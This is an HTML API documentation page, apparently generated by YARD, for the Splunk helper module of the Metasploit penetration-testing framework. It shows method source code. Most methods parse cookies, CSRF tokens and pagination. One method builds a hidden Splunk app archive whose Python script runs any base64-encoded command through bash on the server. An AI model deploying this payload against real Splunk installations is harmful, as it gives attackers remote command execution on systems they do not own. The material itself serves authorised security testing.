adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HTTP/Splunk/Helpers.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

972 lines
35 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::Splunk::Helpers
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::Splunk::Helpers";
relpath = '../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (H)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Splunk.html" title="Msf::Exploit::Remote::HTTP::Splunk (module)">Splunk</a></span></span>
&raquo;
<span class="title">Helpers</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::Splunk::Helpers
</h1>
<div class="box_info">
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="../Splunk.html" title="Msf::Exploit::Remote::HTTP::Splunk (module)">Msf::Exploit::Remote::HTTP::Splunk</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/splunk/helpers.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>Module with helper methods for other Splunk module methods</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#cookies_hash-instance_method" title="#cookies_hash (instance method)">#<strong>cookies_hash</strong>(cookie) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Converts a cookie string into a hash.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_csrf_token-instance_method" title="#extract_csrf_token (instance method)">#<strong>extract_csrf_token</strong>(cookie) &#x21d2; String<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extracts the Splunk CSRF token from a cookie string.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_next_page_vars-instance_method" title="#extract_next_page_vars (instance method)">#<strong>extract_next_page_vars</strong>(html) &#x21d2; Hash<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extracts pagination parameters from the Next link in the Splunk table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#filter_apps-instance_method" title="#filter_apps (instance method)">#<strong>filter_apps</strong>(apps, filter = {}) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Filters a hash of Splunk apps based on provided attributes.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#splunk_helper_extract_token-instance_method" title="#splunk_helper_extract_token (instance method)">#<strong>splunk_helper_extract_token</strong>(timeout = 20) &#x21d2; String<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Helper method to get tokens for login.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#splunk_helper_malicious_app-instance_method" title="#splunk_helper_malicious_app (instance method)">#<strong>splunk_helper_malicious_app</strong>(app_name) &#x21d2; Rex::Text </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Helper method to construct malicious app in .tar.gz form.</p>
</div></span>
</li>
</ul>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="cookies_hash-instance_method">
#<strong>cookies_hash</strong>(cookie) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Converts a cookie string into a hash</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cookie</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Cookie string in the format "key1=value1; key2=value2"</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>Hash mapping cookie names to their values</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
110
111
112
113
114
115
116
117
118
119</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 110</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cookies_hash'>cookies_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='lbrace'>{</span><span class='rbrace'>}</span> <span class='kw'>if</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each_with_object'>each_with_object</span><span class='lparen'>(</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_pair'>pair</span><span class='comma'>,</span> <span class='id identifier rubyid_hash'>hash</span><span class='op'>|</span>
<span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_value'>value</span> <span class='op'>=</span> <span class='id identifier rubyid_pair'>pair</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>=</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='int'>2</span><span class='rparen'>)</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_hash'>hash</span><span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_csrf_token-instance_method">
#<strong>extract_csrf_token</strong>(cookie) &#x21d2; <tt>String</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Extracts the Splunk CSRF token from a cookie string</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cookie</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Cookie string containing the CSRF token</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The CSRF token for the current Splunk port, or nil if not found</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
125
126
127
128
129
130
131
132
133
134</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 125</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_csrf_token'>extract_csrf_token</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>if</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_cookie'>cookie</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_cookies'>cookies</span> <span class='op'>=</span> <span class='id identifier rubyid_cookies_hash'>cookies_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_cookie'>cookie</span><span class='rparen'>)</span>
<span class='id identifier rubyid_target_key'>target_key</span> <span class='op'>=</span> <span class='id identifier rubyid_cookies'>cookies</span><span class='period'>.</span><span class='id identifier rubyid_keys'>keys</span><span class='period'>.</span><span class='id identifier rubyid_find'>find</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_key'>key</span><span class='op'>|</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^splunkweb_csrf_token_(\d+)$</span><span class='regexp_end'>/</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cookies'>cookies</span><span class='lbracket'>[</span><span class='id identifier rubyid_target_key'>target_key</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_target_key'>target_key</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_next_page_vars-instance_method">
#<strong>extract_next_page_vars</strong>(html) &#x21d2; <tt>Hash</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Extracts pagination parameters from the Next link in the Splunk table.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>html</span>
<span class='type'>(<tt>Nokogiri::HTML::Document</tt>)</span>
&mdash;
<div class='inline'>
<p>The HTML document to parse.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>Returns a hash of GET parameters if a next page exists, otherwise nil.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
140
141
142
143
144
145
146
147
148
149
150</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 140</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_next_page_vars'>extract_next_page_vars</span><span class='lparen'>(</span><span class='id identifier rubyid_html'>html</span><span class='rparen'>)</span>
<span class='id identifier rubyid_next_link'>next_link</span> <span class='op'>=</span> <span class='id identifier rubyid_html'>html</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>li.next a</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_next_link'>next_link</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>href</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='const'>URI</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_next_link'>next_link</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>href</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_query'>query</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>?</span> <span class='const'>Rack</span><span class='op'>::</span><span class='const'>Utils</span><span class='period'>.</span><span class='id identifier rubyid_parse_query'>parse_query</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='kw'>nil</span>
<span class='kw'>rescue</span> <span class='const'>URI</span><span class='op'>::</span><span class='const'>InvalidURIError</span>
<span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="filter_apps-instance_method">
#<strong>filter_apps</strong>(apps, filter = {}) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Filters a hash of Splunk apps based on provided attributes</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>apps</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of apps where keys are app names and values are attribute hashes</p>
</div>
</li>
<li>
<span class='name'>filter</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>A hash of attributes to filter by (e.g., { status: 'enabled' })</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of apps that match all filter criteria</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
100
101
102
103
104</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 100</span>
<span class='kw'>def</span> <span class='id identifier rubyid_filter_apps'>filter_apps</span><span class='lparen'>(</span><span class='id identifier rubyid_apps'>apps</span><span class='comma'>,</span> <span class='id identifier rubyid_filter'>filter</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_apps'>apps</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid__name'>_name</span><span class='comma'>,</span> <span class='id identifier rubyid_attributes'>attributes</span><span class='op'>|</span>
<span class='id identifier rubyid_filter'>filter</span><span class='period'>.</span><span class='id identifier rubyid_all?'>all?</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_value'>value</span><span class='op'>|</span> <span class='id identifier rubyid_attributes'>attributes</span><span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='id identifier rubyid_value'>value</span> <span class='rbrace'>}</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="splunk_helper_extract_token-instance_method">
#<strong>splunk_helper_extract_token</strong>(timeout = 20) &#x21d2; <tt>String</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Helper method to get tokens for login</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>timeout</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>20</tt>)</em>
&mdash;
<div class='inline'>
<p>The maximum number of seconds to wait before the request times out</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>Post data to use for login</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
9
10
11
12
13
14
15
16
17
18
19
20
21</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 9</span>
<span class='kw'>def</span> <span class='id identifier rubyid_splunk_helper_extract_token'>splunk_helper_extract_token</span><span class='lparen'>(</span><span class='id identifier rubyid_timeout'>timeout</span> <span class='op'>=</span> <span class='int'>20</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_splunk_url_login'>splunk_url_login</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>keep_cookies</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_res'>res</span><span class='op'>&amp;.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>==</span> <span class='int'>200</span>
<span class='id identifier rubyid_vprint_error'>vprint_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Unable to get login tokens</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>session_id_</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_numeric'>rand_text_numeric</span><span class='lparen'>(</span><span class='int'>40</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>; </span><span class='tstring_end'>&quot;</span></span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_get_cookies'>get_cookies</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="splunk_helper_malicious_app-instance_method">
#<strong>splunk_helper_malicious_app</strong>(app_name) &#x21d2; <tt>Rex::Text</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Helper method to construct malicious app in .tar.gz form</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>app_name</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Name of app to upload</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Rex::Text</tt>)</span>
&mdash;
<div class='inline'>
<p>Malicious app in .tar.gz form</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/splunk/helpers.rb', line 27</span>
<span class='kw'>def</span> <span class='id identifier rubyid_splunk_helper_malicious_app'>splunk_helper_malicious_app</span><span class='lparen'>(</span><span class='id identifier rubyid_app_name'>app_name</span><span class='rparen'>)</span>
<span class='comment'># metadata folder
</span> <span class='id identifier rubyid_metadata'>metadata</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [commands]
</span><span class='tstring_content'> export = system
</span><span class='heredoc_end'> EOF
</span>
<span class='comment'># default folder
</span> <span class='id identifier rubyid_commands_conf'>commands_conf</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>]
</span><span class='tstring_content'> type = python
</span><span class='tstring_content'> filename = </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>.py
</span><span class='tstring_content'> local = false
</span><span class='tstring_content'> enableheader = false
</span><span class='tstring_content'> streaming = false
</span><span class='tstring_content'> perf_warn_limit = 0
</span><span class='heredoc_end'> EOF
</span>
<span class='id identifier rubyid_app_conf'>app_conf</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> [launcher]
</span><span class='tstring_content'> author=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'> description=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>Lorem</span><span class='period'>.</span><span class='id identifier rubyid_sentence'>sentence</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'> version=</span><span class='embexpr_beg'>#{</span><span class='const'>Faker</span><span class='op'>::</span><span class='const'>App</span><span class='period'>.</span><span class='id identifier rubyid_version'>version</span><span class='embexpr_end'>}</span><span class='tstring_content'>
</span><span class='tstring_content'>
</span><span class='tstring_content'> [ui]
</span><span class='tstring_content'> is_visible = false
</span><span class='heredoc_end'> EOF
</span>
<span class='comment'># bin folder
</span> <span class='id identifier rubyid_msf_exec_py'>msf_exec_py</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;~EOF</span>
<span class='tstring_content'> import sys, base64, subprocess
</span><span class='tstring_content'> import splunk.Intersplunk
</span><span class='tstring_content'>
</span><span class='tstring_content'> header = [&#39;result&#39;]
</span><span class='tstring_content'> results = []
</span><span class='tstring_content'>
</span><span class='tstring_content'> try:
</span><span class='tstring_content'> proc = subprocess.Popen([&#39;/bin/bash&#39;, &#39;-c&#39;, base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
</span><span class='tstring_content'> output = proc.stdout.read()
</span><span class='tstring_content'> results.append({&#39;result&#39;: base64.b64encode(output).decode(&#39;utf-8&#39;)})
</span><span class='tstring_content'> except Exception as e:
</span><span class='tstring_content'> error_msg = &#39;Error : &#39; + str(e)
</span><span class='tstring_content'> results = splunk.Intersplunk.generateErrorResults(error_msg)
</span><span class='tstring_content'>
</span><span class='tstring_content'> splunk.Intersplunk.outputResults(results, fields=header)
</span><span class='heredoc_end'> EOF
</span>
<span class='id identifier rubyid_tarfile'>tarfile</span> <span class='op'>=</span> <span class='const'>StringIO</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Tar.html" title="Rex::Tar (module)">Tar</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Tar/Writer.html" title="Rex::Tar::Writer (class)">Writer</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span> <span class='id identifier rubyid_tarfile'>tarfile</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_tar'>tar</span><span class='op'>|</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/metadata/default.meta</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_metadata'>metadata</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/default/commands.conf</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_commands_conf'>commands_conf</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/default/app.conf</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_app_conf'>app_conf</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tar'>tar</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>/bin/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_app_name'>app_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>.py</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0o644</span><span class='rparen'>)</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_io'>io</span><span class='op'>|</span>
<span class='id identifier rubyid_io'>io</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span> <span class='id identifier rubyid_msf_exec_py'>msf_exec_py</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_rewind'>rewind</span>
<span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
<span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_gzip'>gzip</span><span class='lparen'>(</span><span class='id identifier rubyid_tarfile'>tarfile</span><span class='period'>.</span><span class='id identifier rubyid_string'>string</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:28 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink